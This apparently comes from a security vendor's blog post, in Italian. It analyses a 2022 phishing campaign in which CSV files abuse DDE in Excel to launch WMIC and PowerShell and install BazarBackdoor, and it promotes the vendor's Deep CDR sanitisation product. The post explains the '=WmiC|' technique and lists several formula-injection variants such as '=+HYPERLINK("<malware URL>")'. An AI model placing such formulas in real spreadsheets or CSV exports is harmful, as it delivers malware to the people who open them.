Nel febbraio 2022, il ricercatore di malware Chris Campbell ha individuato una nuova campagna di phishing che utilizza file di testo CSV (valori separati da virgole) appositamente creati per infettare i dispositivi degli utenti con il trojan BazarBackdoor. In questo post del blog, analizziamo lo scenario di attacco e vi mostriamo come prevenire questo sofisticato attacco con Deep CDR
(Content Disarm and Reconstruction).
La tattica di attacco
In questa campagna di phishing, i criminali informatici hanno utilizzato un file CSV, un file di testo delimitato che memorizza i dati in un formato tabellare e utilizza una virgola per separare i valori. Questo tipo di file è un modo popolare per scambiare dati semplici tra database e applicazioni. Poiché un file CSV contiene semplicemente del testo senza codice eseguibile, molti utenti pensano che sia innocuo e aprono rapidamente il documento senza alcuna cautela. Non sospettano che il file possa essere un vettore di minacce attraverso il quale il malware può entrare nei loro dispositivi se il file CSV viene aperto con applicazioni che supportano lo scambio dinamico di dati (DDE), come Microsoft Excel e OpenOffice Calc. Queste applicazioni possono eseguire le formule e le funzioni contenute nel file CSV. Gli autori delle minacce abusano di questa funzione DDE per eseguire comandi arbitrari, che scaricano e installano il trojan BazarBackdoor, per compromettere e ottenere l'accesso completo alle reti aziendali dal dispositivo dell'ignara vittima. Rispetto agli approcci di attacco più diffusi, che prevedono una macro dannosa o un codice VBA nascosto in un file MS Office, le minacce nascoste all'interno dei documenti DDE sono più difficili da rilevare.
Esaminando attentamente il file, si può notare un comando =WmiC| (Windows Management Interface Command) contenuto in una delle colonne di dati. Se le vittime permettono inavvertitamente l'esecuzione di questa funzione DDE, essa creerà un comando PowerShell. Il comando aprirà quindi un URL remoto per scaricare un BazarLoader e BazarBackdoor verrà installato sul computer della vittima.
Come Deep CDR vi aiuta a difendervi dagli attacchi DDE
È possibile proteggere la rete da queste sofisticate campagne di phishing eliminando i file allegati alle e-mail prima che raggiungano gli utenti. Con l'idea che ogni file rappresenti una potenziale minaccia e concentrandosi sulla prevenzione piuttosto che sul semplice rilevamento, Deep CDR elimina tutti i contenuti attivi dei file mantenendo la stessa usabilità e funzionalità. Deep CDR è una delle sei tecnologie chiave di MetaDefender , la piattaforma di prevenzione avanzata delle minacce di OPSWATche abbraccia realmente la filosofia Zero Trust.
Di seguito sono riportati i dettagli della sanificazione dopo aver elaborato il file CSV infetto con MetaDefender Core (è possibile fare riferimento anche al risultatodella scansione su MetaDefender Cloud). Deep CDR ha neutralizzato la formula del file, quindi non è stato creato alcun comando PowerShell. Il malware non poteva quindi essere scaricato.
In attacchi simili, gli autori delle minacce utilizzano formule più complesse per eludere il rilevamento. Normalmente, le formule in MS Excel iniziano con un segno di uguale (=). Tuttavia, poiché questa applicazione accetta anche formule che iniziano con un segno diverso, come "=+"o "@", invece del solo "=", la formula distruttiva nei file CSV può essere:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
Questo tipo di formule può eludere alcuni comuni sistemi CDR. Tuttavia, Deep CDR può facilmente gestire questa tattica e produrre file puliti e sicuri da consumare, neutralizzando così la minaccia.
Per saperne di più Deep CDR o parlate con un esperto tecnico di OPSWAT per scoprire le migliori soluzioni di sicurezza per proteggere la rete aziendale e gli utenti da attacchi zero-day e malware evasivo avanzato.
